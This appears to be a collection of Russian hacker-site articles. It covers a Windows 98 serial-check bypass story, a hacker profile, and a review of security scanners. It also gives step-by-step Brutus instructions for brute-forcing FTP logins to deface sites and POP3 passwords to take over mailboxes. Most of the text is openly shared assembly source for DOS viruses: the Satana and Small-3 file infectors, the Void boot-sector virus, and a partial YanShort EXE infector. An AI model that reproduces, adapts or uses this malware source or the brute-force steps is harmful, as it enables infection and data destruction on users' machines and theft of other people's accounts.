Как я ломал MustDie



Все началось с того, что меня достала постоянно выскакивающая табличка AVP при старте, и я снес его (AVP) на хрен. Как ты догадался, ничего хорошего из этого не вышло, а вышел только Win95.CIH. Которого я расколол весьма вовремя - за три дня до срабатывания. В ходе лечения упали форточки, и тут-то все и началось :)))
Дистрибутив виндов пришел ко мне без CD (лежал на винте), никаких файлов типа serial.txt в каталоге CABS не было, и единственным способом узнать их серийный номер был реестр. По уму, перед переустановкой форточек надо было слазить туда и выписать его на бумажку. Чего я, по своей природной лени, не сделал. "Ну и что?" - скажешь ты. - "Винды-то, если ключ не ввести, инсталлиться не захотят, и волей-неволей придется лезти в реестр?"
Оно так, если у тебя Retail версия форточек. А мне попалась OEM. Которая сначала файлы копирует, а потом уже ключ запрашивает. И если его не ввести, то тебе ни винды загрузить, ни ключик подсмотреть уже не удастся. Да, запущенный случай...
И тут, после очередной перезагрузки, что-то мне в голову стукнуло. Думаю: раз серийный номер в реестр после установки записывается, значит, можно его того... Посмотреть, какого именно номера он от меня хочет.
Ниточка была тоненькой, но я за нее ухватился. Итак, перезагрузился я в Command prompt mode и замутил такую вещь:

C:\>
C:\>cd\windows
C:\WINDOWS>regedit /E c:\hacks\mustdie.txt
Exporting to mustdie.txt............ OK.
c:\windows>c:\16apps\nc\nc.exe
Что это было? Об'ясняю.
cd\windows - переходим в каталог недоустановленных форточек.
regedit /E ... - ну это мы типа экспортируем реестр из нечитаемого SYSTEM.DAT в txt файл.
Exporting ... - это сообщение мастдая об удачно произведенном експорте.
Ну и наконец, запускаем Нортон с целью просмотра текстовика. Перехожу в каталог c:\Hacks, нахожу mustdie.txt... и что же я вижу? Послания от дяди Билла? Нет, я вижу вот такую бодягу:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion] - Здесь ты всегда можешь разнюхать серийный номер к своему мастдаю.
Так, ProductType... RegisteredOwner... Нет, не то. А, вот оно!
...
ProductId=""
...
Пустоооо? Ну ясный перец, не все ж в Microsoft ламера работают... А как же мне теперь узнать серийный номер?
А НА КОЙ МНЕ ЕГО УЗНАВАТЬ, ЕСЛИ МОЖНО САМОМУ ВПИСАТЬ?!!!
Так внезапно пронзила меня догадка. "Ну, если это прокатит, я буду ходить и всем рассказывать про ламерство программеров, и про то, что их девиз - "пусть каждый придумает себе серийный номер!" и опускать дядю Билла", - думал я, правя реестр... нет, уже не в Нортоне, а в DN - Нортон файлы больше 65536 байт не открывает. И вот что у меня получилось:
...
ProductId="IWILL-FUCKU-MUSTD-IE*HI-GATES"
...
Да! Это круче, чем какой нибудь K4HVD-R5G78-KI9FF-W5NL4-R9J6IZ. А теперь -


C:\>
c:\windows\regedit /C c:\hacks\mustdie.txt
Importing from mustdie.txt........... OK.

Всосал! И что же он теперь скажет? Наверняка "файл установки поврежден"... Набираем win и...

Форточки грузятся, не запрашивая номера! Вот это круто! 20 минут шевеления мозгами - и дядя Билл опять в глубокой ... ! Так я еще раз доказал простую истину: Win98 - Mustdie!




автор: DenisVIP


Copyright © " HACK-INFO" " info@xakep.dax.ru"
При использовании материалов обязательна ссылка на http://hack-info.tk .

Портрет Российского Хакера



ИХ ОПАСHО ЗЛИТЬ.
ОHИ УМHЫ И ИЗОБРЕТАТЕЛЬHЫ.
ЛУЧШИЕ ИЗ HИХ - HЕЧТО СРЕДHЕЕ МЕЖДУ ФАHТОМАСОМ И ГАРРИ ГУДИHИ.
ХАКЕРЫ.

Когда-то у меня была кpедитная каpточка VISA.Hи у кого тогда не
было, а у меня была. Мало того что удобно,так еще и пpедмет
гоpдости. Однажды этот пpедмет меня изpядно удивил. В конце месяца из
банка пpишел счет,где в числе pасxодов стоял пункт: PIZZA HUT - $30.
Пpи всей моей любви к амеpиканскому наpоду в "Пиццу Хат" в здpавом
уме,да за свои деньги... Hет,очень стpанно. В pестоpане полдня искали
копию моего счета,не нашли,долго извинялись и веpнули мои тpидцать
доллаpов. Еще чеpез месяц банк сообщил мне,что я потpатила в магазине
Christian Dior $12 (как pаз на четвеpть тюбика помады)... Поскольку
никакого обьяснения пpисxодящему не наxодилось,случаи больше не
повтоpялись,я pешила,что во всем виноваты банковские компьютеpы,и
забыла... А недавно поговоpила с xакеpом и мигом вспомнила.
Думаю многим знакомы (из кино и пpессы) истоpии о том,как особо
способные детишки в пpоцессе игpы с пеpсональным компьютеpом
забиpались в секpетные файлы ЦРУ,ФБР,Конгpесса и дpугиx уважающиx
себя оpганизаций. Оpганизации,как водится, поднимали кpик о том,куда
смотpят pодители,и пытались завести судебное дело вместо того,чтобы
уволить паpочку pаботнников службы компьютеpной безопасности. Так вот
эти дети и есть настоящие юные xакеpы. Чтобы стать xакеpами
полноценными, им надо лишь чуть-чуть подpасти. И тогда из банальныx
Вась,Миш,Джонов и Кpисов они пpевpатятся в pебят по имени Сектоp 9,
Доктоp Hоу, Чокнутый, ТТМ, Вобла... кто как покpуче сможет
самовыpазиться. Иx жизнь pазделится на две неpавные части. Одна,
цивильная, как все - студент со сpедними достижениями в учебе;
дpугая,основная,в кpесле у компьютеpа - коваpный взломщик сетей,новый
Робин Гуд с девизом на щите:"Инфоpмация должна быть доступна всем".
Хотя иx собственный язык понятен пpостому (pоссийскому,напpмеp)
обывателю не больше,чем диалог укpаинскиx политиков:некотоpые
знакомые слова попадаются,но общий смысл ускользает. Забастить...
тpейдить по двести мег в день...ваpезная сцена...любимая боpда... Или
вот классический случай. Встpечаются два xакеpа:
- Ты что такой гpустный?
- Да мать сдоxла,надо новую искать.
Легче всего было бы обвинить молодежь в pаспущенности и цинизме.
Hо вместо этого гоpю пpосто нужно посочувствовать: xакеp ни на кого
не пpоменяет свою маму,а убивается по сломавшейся детали под
названием "матеpинская плата",без котоpой ни один компьютеp pаботать
не желает.
Еще один набоp малопонятныx теpминов - классификация xакеpов по
узким спецальностя. Собственно слово "xакеp" употpебляется для теx,
кто внедpяется в чужие системы. Кpоме того имеются: фpикеpы, знающие
как упpавляться с телефонной станцией на pасстоянии,или ломающие
сотовые телефоны; кpэкеpы(не путать с кpекеpами "Hежность"), котоpые
взламывают пpогpаммы с защитой,пpодающиеся в магазинаx (напpимеp,
игpы); и,наконец,каpдеpы,живущие за счет чужиx кpедитныx каpточек.
Один из ниx,очевидно,и наслаждался Большой Пиццей с Гpибами и Салатом
за мои 30 доллаpов. Каpдеpы,поxоже, вольготно чувствуют себя только у
нас в стpане,поскольку на Западе иx отлов уже xоpошо отpаботан. В
России же,где тепеpь можно заказывать товаpы по телефону или чеpез
компьютеp,указав номеp своей каpточки,систему безопасности
только-только начинают налаживать. Hе говоpя уже о немалом количестве
фальшивыx кpедиток,котоpые шустpо печатают наши кулибины.
Впpочем,желающиx связываться с банками не так много,и участь иx
чаще всего печальна. Вот,скажем,истоpия с самым знаменитым тепеpь
pоссийским xакеpом Левиным и Сити-Банком. Она pассказана уже во
многиx ваpиантаx, и все кpайне сомнительны. Даже сумма называется
везде pазная - от 300 тысяч доллаpов до 10 миллионов. Очевидно одно:
Левин ничего не взламывал. Пpосто в системе сети банка была ошибка,
так называемый "глюк", котоpый он обнаpужил. А в этом никакого
геpоизма нет. Это как догадаться,что в метpо по одному жетончику
могут пpойти двое,один пpижавшись к дpугому. В Сити-Банке отдаленные
pасстоянием служащие имели доступ к инфоpмации. И сpазу после того,
как легальный "клиент" отключался,возможность пpойти его же путем
оставалась. Ею и воспользовался Левин.
Бывали и удачные исключения. Со счетов BMW однажды пpопала
какая-то колоссальная сумма,много миллионов - но никого не нашли,а
дело замяли. Оно и понятно: какой солидной компании xочется,чтоб все
знали,как она лопуxнулась.
У нас такие кpасивые истоpии пока совеpшенно исключены.
Во-пеpвыx,компьютеpные сети внутpи банков и компаний совеpшенно не
pазвиты. Так что гpабить иx можно только по стаpинке: в маске и с
огнестpельным оpужием.Если же все-таки сеть имеется,то вступает в
силу "во-втоpыx": pезультатом даже самыx pобкиx попыток покопаться в
банковскиx компьютеpаx может стать блоизкое знакомство со стаpинным
огнестpельным методом. Вот,к пpимеpу,письмо нашего соотечественника,
некоего TGK,недавно блуждавшее Читать далее...

Как дать отпор Хакерам



Как дать отпор Хакерам?

Первое, что приходит в голову многим системным администраторам, когда они думают о защите своих сетей от атак злоумышленников из Интернета, это слово "брандмауэр". Брандмауэры (сетевые экраны) - неотъемлемая часть инфраструктуры защиты сети, однако просто установить брандмауэр и надеяться на лучшее - опасно и глупо. Если не выбрать надлежащую конфигурацию серверов и не придерживаться сильной стратегии защиты, то шансы на успех у атакующих вашу сеть значительно повышаются. Как уже неоднократно писалось, большинство злоумышленников нападает с внутренней стороны брандмауэра. Это недовольные сотрудники фирмы или хакеры, нашедшие лазейку в системе. По этой причине к защите каждой сети нужно подходить очень внимательно и не ограничиваться предотвращением доступа из Интернета.
Еще одно опасное заблуждение заключается в том, что серверы будто бы уже поставляются с необходимыми средствами обеспечения безопасности. Между тем, в защите каждой сетевой операционной системы имеются многочисленные пробелы, и чтобы считать свой сайт действительно защищенным, их необходимо ликвидировать. Отсутствие строгой стратегии обеспечения безопасности интрасети и серверов Интернета может усугубить ситуацию. Чтобы получить бессонницу, администратору сети достаточно попытаться установить последние поправки к системе защиты сетевой ОС.
Сделать жизнь сотрудников, отвечающих за работу сети, более спокойной помогут инструментальные средства сканирования сетевой и системной защиты в сочетании с хорошо спланированной стратегией безопасности и ПО обнаружения нарушителей. Эти продукты сканируют сетевые серверы по заданному расписанию и автоматически выводят отчеты, позволяя быстро обнаружить ошибки в конфигурации, неправильно инсталлированное (с точки зрения защиты) серверное ПО и пробелы в защите (преднамеренные или нет), и принять необходимые меры.
В лаборатории ZD Internet Lab были испытаны три инструментальных средства защиты на базе Windows NT.
К сожалению, компания Network Associates не смогла вовремя представить последнюю версию своего сканера CyberCop Scanner (прежнее название Ballista), Axent Technologies отказалась принять участие в обзоре, сославшись на предстоящее обновление своего продукта, а фирма Netect не подготовила NT-версию продукта Netective (ко времени написания обзора она проходила бета-тестирования, но версия для ОС Solaris уже существует).
Итоговый анализ
ISS Internet Scanner 5.2
Продукт ISS Internet Scanner 5.2 мы выбрали по многим причинам. Он оказался наиболее полным в плане поиска проблем в системе защиты и предлагал наиболее исчерпывающие решения каждой проблемы. Это ПО выявило все недостатки в защите, обнаруженные остальными двумя продуктами, и дополнило их десятками других найденных пробелов. Функциональные возможности вывода отчетов в Internet Scanner 5.2 оказались просто феноменальными, а сами отчеты детальны и легко читаемы. Они предназначены не только для технических специалистов. В сводных отчетах для руководителя вопросы защиты сети поясняются и становятся намного понятнее. Сканирование сети в Internet Scanner 5.2 производится быстро и полно, а результаты мы смогли использовать для генерации множества отчетов и, при необходимости, обращаться к оригинальным данным.
Слабые места систем
Существуют следующие, наиболее распространенные, слабые места, характерные для многих сетевых операционных систем.
Слабая защита по паролю.
Доступ через анонимный FTP.
Неиндексированные каталоги WWW.
Разрешенная функция Finger.
Разрешенные банеры Telnet/sendmail.
Разрешенная учетная запись Guest.
Неправильная конфигурация RPC.
Ошибки в IIS .bat и .cmd.
Уязвимость TFTP.
Неверная конфигурация NFS.

ПО Internet Scanner 5.2 компании Internet Security Systems (Атланта) - самый давний из протестированных нами продуктов оценки защиты, и большой опыт положительно сказывается на его работе. На нас произвели впечатление простота установки данной программы, превосходные средства вывода отчетов и широкая поддержка платформ.
Internet Scanner - компонент защиты семейства продуктов SAFEsuite компании Internet Security Systems. Кроме этого, SAFEsuite включает в себя компоненты выявления вторжения RealSecure и инструмент для детального анализа конфигураций серверов Unix System Security Scanner (S3). Разрабатывается версия S3 для Windows NT. Internet Scanner функционирует в сетях Windows NT 4.0, AIX, HP-UX, Solaris и Linux. Продукт может выявлять "дыры" в защите, недостатки в конфигурации Windows NT Server и Workstation, машин Windows 95 и серверов Unix. Все проверки системы и сканирование выполняются через TCP/IP в локальной сети.
Установить ПО Internet Scanner оказалось нетрудно. Мы загрузили самую последнюю его версию с веб-узла ISS и легко выполнили процесс инсталляции. После установки ПО на нашем сервере Windows NT нам потребовалось только скопировать файл ключа ISS в каталог Internet Scanner, после чего можно было начинать сканирование. Сервер ключа Читать далее...

Основы работы c Brutus



По многочисленным просьбам посетителей нашего сайта, собственно и была написана эта статья-руководство по всем известной проге "Brutus". Эта программа используется в первую очередь для подбора паролей по различным протоколам, таким как: HTTP (Basic Auth), HTTP (Form), FTP, POP3, Telnet, SMB (NetBIOS) и Custom (позволяет указать свои настройки). Сегодня мы рассмотрим наиболее нужные, это: FTP и POP3. Итак начнём. Сначало надо скачать эту самую прогу. Далее начнём с рассмотрения первого варианта: FTP.

Подбор паролей к FTP.

Большинство сайтов управлюятся протоколом передачи данных FTP. Если знать пароль и логин к этому самому ftp, то перед вами открываются полные возможности управлением всеми данными расположенными на ftp. Можно стирать, записывать, копировать, вобщем делать всё что захотите. Чтобы подобрать логин и пасс к нужному вам ftp, можно воспользоваться несколькими вариантами, но сегодня мы рассмотрим наиболее простой и удобный вариант. После запуска "Брутуса" (от англ. Brute Force - ВЛОБ) открывается окно, в котором на первый взгляд содержится куча (для начинающего) непонятных настроек. На самом деле всё элементарно просто, и наиболее необходимые настройки мы с вами рассмотрим далее. Итак если вы хотите сделать deface сайту http://www.vasia.boom.ru ( сайт хостится бесплатным хостингом BOOM.RU ), всё что вам нужно это подобрать логин и пасс к ftp хранящим файлы этого сайта. Для этого в окне "Брутуса" в строке Type выбираем соответственно протокол FTP. Затем в строке Target надо подставить адрес для доступа по FTP ( для сайтов размещённых на бесплатном хостинге BOOM.RU он будет ftp.boom.ru ). Строку настроек Connection options и FTP options оставляем без изменения (в них можно настройть: подбор паролей через прокси, порт и т.д). В строке Authentication options ставим галочку на Single User оставляя при этом галку на Use Username, в этой строке нужно указать имя юзера (для сайта www.vasia.boom.ru оно будет vasia). Затем в стоке Pass Mode необходимо выбрать способ подбора паролей. Brute Force - подбор по одному символу, тоесть: 1,2,3,4,5,.....a,b,c,d....abc,abcd и т.д. Этот метод хорошо применяется лишь при подборе пароля юзера к pwl файлу, при этом длительность перебора всех доступных вариантов зависит как от количества символов так и от вычеслительной мощности компьютера. Но одно дело подбирать пароль используя вычеслительныю мощность компа, а другое (в случая с подбром пасса к FTP) используя слабый конект Советского образца на гнилых Российских линяих. Поэтому этот метод отпадает. А вот метод Word List (по словарю) в самый раз. Словарь - это текстовый файл (обычно txt) в котором в строчку содержаться слова, одно из которых при удачной попытке подбора, должно совпасть с паролем. Словари различаются по количеству записанных в них слов, больше количество - больше займёт процедура подбора пароля. Поэтому имеет смысл выбирать не самые больше и не самые маленькие словари (около 8000 слов). Скачать словарь на 7778 слов можно с нашего сайта. Используя этот словарь на соединении 41333-44000 кбод/с процесс перебора всех слов занимает 25-30 мин. Итак в строке Pass Mode выбераем Word List и указываем месторасположение расспакованного словаря. После этого нажимаем кнопочку Start и ждём результата.

Подбор паролей к POP3 (e-mail адрес).

Протокол POP3 используется для получения писем такими прогаммы как: Outlook Express, the Bat и т.д. Тоесть если подобрать пароль используя этот протокол, то вы получаете в своё распоряжения чужой e-mail адрес (наверное неплохо было бы заиметь xakep@xakep.ru или pisem@pisem.net). Для этого в окне программы "Brutus" в строке Type выбераем POP3. Затем в строке Target надо указать реквизиты сервера для полученя писем через POP3. Например у ящика vasia@rambler.ru POP3 будет pop.rambler.ru у ящика vasia@yandex.ru - pop.yandex.ru и т.д. Далее всё то же самое что и в первом методе. В строке Authentication Options ставим галочку в Single User не убирая при этом галку с Use Username и указываем имя юзера (для xakep@xakep.ru оно будет xakep и т.д), жмём Start и ждём положительного (для нас но не для хозяина мыла) результата. Вот вроде бы и всё. Если после этого у вас всё равно остались вопросы....то задавайте их здесь.



автор: Mc PaulMaster



Copyright © " HACK-INFO" " info@xakep.dax.ru"
При использовании материалов обязательна ссылка на http://hack-info.tk .

вирус Satana



проверка на наличие в памяти - 0edf1h.
Точка входа из EXE и COM.


lab label byte
entvir proc near
call adres
adres: pop si
sub si,3
;Система проникновения в память.
push ax
push bx
push cx
push dx
push di
push ds
push es
push si
mov ax,0edf1h ;Проверка на наличие в памяти.
int 21h
cmp ax,0ffffh
je inmem
mov ax,es
dec ax
mov es,ax
mov bx,3
sub word ptr es:[bx],leng16
dec bx
mov ax,[bx]
sub ax,leng16
mov [bx],ax
mov es,ax
xor di,di
cld
mov cx,leng
push cs
pop ds
rep movsb
push es
pop ds
mov ax,3521h
int 21h
mov old21,bx
mov old21+2,es
mov ah,25h
lea dx,virus
int 21h
inmem: pop si
pop es
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
;Cистема возврата управления в файл.
add si,offset oldbyts
cmp cs:word ptr[si],'ZM'
je exeinp
mov di,100h
push di
cld
movsw
movsb
ret
exeinp: push ax
mov ax,ds
add ax,10h
add cs:[si+22],ax
pop ax
jmp cs:dword ptr[si+20]
entvir endp
;Основной процессор вируса.
;Управляет размножением и гадостями.
virus proc near
pushf
cmp ax,0edf1h ;Cистемная функция вируса.
je tstvir
cmp ax,4b00h ;Проверка запроса на выполнение.
je lodfil
cmp ah,3dh ;Проверка запроса на открытие файла.
je opnfil
cmp ah,4fh ;Проверка на получение каталога.
je cat
cmp ah,4eh ;Проверка на получение первого файла.
je cat
goint: popf
jmp cs:dword ptr old21
;Ответ на запрос о наличии в памяти.
tstvir: mov ax,0ffffh
popf
iret
;Обработка запросов на открытие и запуск.
opnfil:
lodfil: call tstfil
jne exld
call inffil
;Не пора ли Сатане на бал?
push ax
push bx
push cx
push ds
push dx
mov ah,4
int 1ah
jc exld1
cmp dx,1111h
jne exld1
;ПОРА!!!
pop dx
push dx
mov ax,3d02h
call ld21
jc exld1
mov bx,ax
push cs
pop ds
lea dx,satana
mov ah,40h
mov cx,24
call ld21
mov ah,3eh
call ld21
exld1: pop dx
pop ds
pop cx
pop bx
pop ax
exld: jmp goint
;Корректировка длины при получении каталога или стирание каталога.
cat: popf
call ld21
jc excat
pushf
push ax
push bx
push cx
push dx
push ds
push es
mov ah,2fh
call ld21
push es
pop ds
mov al,[bx+16h]
and al,00011111b
cmp al,31
jne excor
sub word ptr[bx+1ah],leng
sbb word ptr[bx+1ch],0
excor: pop es
pop ds
pop dx
pop cx
pop bx
pop ax
popf
excat: sti
retf 2
virus endp
;Проверяет имя файла на EXE или COM.
;В случае соответствия устанавливает флаги для JE.
tstfil proc near
push si
call convstr
cmp word ptr[si],'OC'
je cntcom
cmp word ptr[si],'XE'
jne extst
cmp byte ptr[si+2],'E'
extst: pop si
ret
cntcom: cmp byte ptr[si+2],'M'
jmp extst
tstfil endp
;Преобразует строку параметров в заглавные буквы и возвращает
;в SI смещение расширения файла.
convstr proc near
push ax
mov si,dx
cld
cnt: lodsb
cmp al,0
je exit1
cmp al,'a'
jae cntlt
jmp cnt
cntlt: cmp al,'z'
ja cnt
sub al,32
mov [si-1],al
jmp cnt
exit1: sub si,4
pop ax
ret
convstr endp
;Заражает файл с именем по адресу DS:[DX].
inffil proc near
push ax
push bx
push cx
push dx
push si
push ds
push es
push ds
push dx
mov ax,3524h
push cs
pop ds
call ld21
mov old24es,es
mov old24bx,bx
lea dx,area24
mov ah,25h
call ld21
pop dx
pop ds
mov ax,4301h
xor cx,cx
call ld21
jc cnti1
mov ax,3d02h
call ld21
jnc cninf
cnti1: jmp exinf
cninf: mov bx,ax
push cs
pop ds
mov ax,5700h
call ld21
mov date1,cx
mov date2,dx
mov al,cl
and al,00011111b
cmp al,31
je exinf1
cntinf: mov ah,3fh
mov cx,24
lea dx,oldbyts
call ld21
jc exinf1
xor cx,cx
xor dx,dx
mov ax,4202h
call ld21
cmp ax,500
jbe exinf1
push ax
push dx
mov ah,40h
xor dx,dx
mov cx,leng
call ld21
cmp ax,cx
pop dx
pop ax
jb exinf1
cmp signat,'ZM'
je exeinf
mov byte ptr oldbyts,0E9h
sub ax,3
mov word ptr oldbyts+1,ax
exinf2: mov ax,4200h
xor cx,cx
xor dx,dx
call ld21
mov ah,40h
mov cx,24
lea dx,oldbyts
call ld21
or byte ptr date1,00011111b
exinf1: mov ax,5701h
mov cx,date1
mov dx,date2
call ld21
mov ah,3eh
call ld21
exinf: mov ax,2524h
mov dx,cs:old24bx
push cs:old24es
pop ds
call ld21
pop es
pop ds
pop si
pop dx
pop cx
pop bx
pop ax
ret
exeinf: mov cx,16
div cx
sub ax,hdrsiz
mov oldcs,ax
mov oldip,dx
mov ax,4202h
xor cx,cx
xor dx,dx
call ld21
mov cx,512
div cx
inc ax
mov lastpag,dx
mov filsiz,ax
jmp exinf2
inffil endp
;Вызов Int 21h минуя систему вируса.
ld21 proc near
pushf
call cs:dword ptr old21
ret
ld21 endp
;Обработчик критической ошибки.
area24 proc near
mov al,3
iret
area24 endp
oldbyts label byte
signat dw ?
lastpag dw ?
filsiz dw 2 dup(?)
hdrsiz dw ?
dw 5 dup(?)
oldip dw ?
oldcs dw ?
oldend label byte
db 0dh,0ah
db 'SATANA 666 (C) XSc.'
satana db 'Сатана там правит бал'
labl label byte
old21 dw 2 dup(?)
old24bx dw ?
old24es dw ?
date1 dw ?
date2 dw ?
codesg ends





автор:Kirpot



Copyright © " HACK-INFO" " info@xakep.dax.ru"
При использовании материалов обязательна ссылка на http://hack-info.tk .

Com вирус Small-3



COM вирус Small-3
Не было времени переводить, ну не че переведу через пару месцев :)
-----------------------------------------------------------------------------
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
test proc far
start: db 0E9h
dw 0
entrypoint: call $+3
pop si
sub si, 3
push si
add si,offset oldstart-entrypoint
mov di,100h
movsw ; Mov [si] to es:[di]
movsb ; Mov [si] to es:[di]
pop si
lea dx,ds:[si+FileSize]
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
lea dx,ds:[si+findmask-entrypoint]
mov cx,3Fh
mov ah,4Eh
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
loc_1:
lea dx,ds:[si+FileSize+30]
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_2 ; Jump if carry Set
xchg bx,ax
mov ah,3Fh
lea dx,ds:[si+oldstart-entrypoint]
mov cx,3
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
jc loc_5 ; Jump if carry Set
cmp byte ptr ds:[si+oldstart-entrypoint],0E9h
je loc_5 ; Jump if equal
xor cx,cx ; Zero register
mov ax,4202h
cwd
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
sub ax,3
mov ds:[si+(NewStart-entrypoint)+1],ax
mov dx,si
mov cx,FileSize
mov ah,40h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
xor cx,cx ; Zero register
mov ax,4200h
cwd
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov ah,40h ; '@'
mov cx,3
lea dx,ds:[si+newstart-entrypoint] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_5:
mov ah,3Eh
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_2:
mov ah,4Fh
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_3 ; Jump if carry Set
jmp short loc_1
loc_3:
mov ax,offset start
push ax
retn
OldStart db 090h,90h,0C3h
NewStart db 0E9h
dw 0
FindMask db '*.com'
db 0
FileSize equ ($-entrypoint)
test endp
seg_a ends
end start

Этот вирус я бы назвал антиквариатом :) не очень большие разрушения от него, но в колекцию пойдет.




автор: Voxed



Copyright © " HACK-INFO" " info@xakep.dax.ru"
При использовании материалов обязательна ссылка на http://hack-info.tk .

Void Boot Virus



В пиз*у... не хотел не че больше переводить! просто вот вам стандартный исходник.



org 0

vsize equ old_21h-friend_or_foe
mark equ 3dh+offset sig
loader equ k_kode-friend_or_foe
buffer equ old_21h+4

friend_or_foe:
xor ax,ax
cli
mov ss,ax
mov sp,7c00h
sti
mov si,413h
sub word ptr [si],2
lodsw
mov cl,6
shr ax,cl
mov es,ax
xor ax,ax
mov bx,ax
mov ds,ax
int 13h

k_load:
mov ax,203h
db 0b9h
trksec dw 0
db 0bah
heddrv dw 0
int 13h
jc k_load
push es
mov ax,offset k_kode
push ax
retf

sig db 'VOID'

k_kode:
mov si,21h*4
mov di,offset old_21h
movsw
movsw
mov si,13h*4
mov di,offset old_13h
movsw
movsw
mov ax,0f000h
mov es,ax
xor di,di
mov ax,0cd18h
mov cx,0fffeh

incesticide:
scasw
jz found_cd18h
dec di
loop incesticide

found_cd18h:
dec di
dec di
mov word ptr [si-4],di
mov word ptr [si-2],es
mov di,18h*4
push ds
pop es
mov ax,offset see_dick_run
stosw
mov ax,cs
stosw
mov si,475h
lodsb
or al,al
jz k_boot
mov dl,80h
call infect_HD

k_boot:
push cs
pop ds
mov si,offset buffer
push es
mov di,7c00h
push di
mov cx,200h
rep movsb
retf

see_dick_run:
pusha
push ds
push es
push cs
pop ds
xor ax,ax
mov es,ax
mov si,offset old_21h
mov di,21h*4
cmpsw
jnz change
cmpsw
jnz change
pop es
pop ds
popa

int13h_handler:
pusha
push ds
push es
call infect_boot
pop es
pop ds
popa
cmp ah,2
jz flux
cmp ah,3
jz unhugged
cmp ah,5
jnz return_13h
jmp format_fn

return_13h:
db 0eah
old_13h dd 0
sig2 db 'buz [FS]'

change:
mov si,18h*4
mov ax,offset int13h_handler
stosw

k_flop:
push cs
pop ds
mov ah,3bh
mov dx,offset dotdot
int 21h
jnc k_flop
mov ah,41h
mov dx,offset flop
int 21h
pop es
pop ds
popa
jmp short int13h_handler

flux:
pusha
push ds
push es
call chk_boot
pop es
pop ds
popa
push ds
push es
push bx
call int13h
or dl,dl
js HD_read
call calculate_root
mov ax,201h
add cx,2
jmp short read_kewl

HD_read:
mov ax,201h
mov cx,9

read_kewl:
xor dh,dh
pop bx
pop es
pop ds
jmp short return_13h

unhugged:
pusha
push ds
push es
push bx
push es
call chk_boot
or dl,dl
js HD_write
call calculate_root
mov ax,201h
add cx,2
jmp short write_kewl

HD_write:
mov ax,201h
mov cx,9

write_kewl:
pop es
pop bx
call int13h
pop es
pop ds
popa
jmp return_13h

format_fn:
pusha
push ds
push es
cmp ch,0
jz format_track0
call not_boot

format_track0:
pop es
pop ds
popa
popf
clc
xor ah,ah
retf 2

dotdot db '..'
flop db 'C:\WINDOWS\SYSTEM\IOSUBSYS\HSFLOP.PDR',0

chk_boot:
or dh,dh
jz not_boot
cmp cx,1
jz not_boot
ret

not_boot:
pop ax
pop es
pop ds
popa
jmp return_13h

calculate_root:
call read_boot
lea si,[bx+10h]
lodsb
xchg cx,ax
mov bx,10
div bx
push ax
add ax,3
mul cx
inc ax
pop cx
add cx,ax
lodsw
sub cx,ax
mov ch,1
sub cx,3
ret

write_boot:
mov ah,05h
mov cl,59h
int 16h
mov ax,301h
jmp short int13h_kewl

read_boot:
mov ax,201h

int13h_kewl:
mov cx,1
xor dh,dh
push cs
pop es
mov bx,offset buffer

int13h:
pushf
call dword ptr cs:[old_13h]
ret

infect_boot:
chk_disk:
push cs
pop ds
call read_boot
or dl,dl
js test_HD
lea di,[bx+mark]

is_VBS:
mov si,offset sig
scasw
jnz not_infected
scasw
jnz not_infected
ret

test_HD:
lea si,[bx+1beh]

HD_test:
lodsb
cmp si,80h
jz test_HD_boot
add si,0fh
jmp short HD_test

test_HD_boot:
lodsw
mov dh,ah
mov cl,al
lodsb
mov ch,al
mov ax,201h
call int13h
lea di,[bx+offset sig]
jmp short is_VBS

not_infected:
or dl,dl
js infect_HD

infect_FD:
call calculate_root
xchg ax,cx
push ax
mov di,offset trksec
stosw
inc di
xor ax,ax
stosw
mov ax,303h
mov bx,offset friend_or_foe
pop cx
call int13h
mov si,offset friend_or_foe
mov di,offset buffer+3dh
mov cx,loader
rep movsb
call write_boot
xor ah,ah
int 16h
ret

infect_HD:
call read_boot
mov di,offset trksec
mov ax,7
stosw
inc di
mov ax,80h
stosb
mov ax,303h
mov cx,7
mov bx,offset friend_or_foe
call int13h
mov al,80h
mov di,offset buffer+1beh

scan_partition:
scasb
jz iris_evergreen
add di,0fh
jmp short scan_partition

iris_evergreen:
mov ax,7
stosw
xchg ah,al
stosb
call write_boot
xor ah,ah
int 16h
ret

old_21h:






автор: RealNeo



Copyright © " HACK-INFO" " info@xakep.dax.ru"
При использовании материалов обязательна ссылка на http://hack-info.tk .

Вирус YanShort



Прислали без коментариев, как только я его соображу на асемблере напишу коментарии!



data_area struc

DS_save dw ?
ES_save dw ?
IP_save dw ?
CS_save dw ?
SS_save dw ?
filematch db '*.exe',00h
matchall db '*.*',00h
infected dw 00h
help_flag dw 00h
where_from_flag dw 00h




handle dw ?
ip_old dw ?
cs_old dw ?
ss_old dw ?
far_push dw ?
save_push dw ?
buffer1 db '',63 dup (?)
virus_stamp db 'motherfucker' ;
buffer2 db 2b0h dup (?)
new_area db 64 dup (?)
new_data db 64 dup (?)
pointer1 dw ?
pointer2 dw ?
pointer3 dw ?
pointer4 dw ?
pointer5 dw ?
pointer6 dw ?
pointer7 dw ?
pointer8 dw ?

data_area ends

org 100h

start: call setup_data




adjust equ offset pgm_start
pgm_start label word
virussize equ 2793

work: mov ax,ds
push cs
pop ds
mov si,offset buffer.DS_save
sub si,adjust
add si,bx
mov [si],ax
mov si,offset buffer.ES_save
sub si,adjust
add si,bx
mov ax,es
mov [si],ax
push cs
pop es
push bx

mov ax,2f00h
int 21h
mov cx,bx
pop bx
mov si,offset buffer.pointer1
sub si,adjust
add si,bx
mov [si],cx
add si,2
mov ax,es
mov [si],ax
push cs
pop es
mov di,offset buffer.buffer1
inc di
sub di,adjust
add di,bx
mov dx,0000h
push bx
call search_exe
pop bx
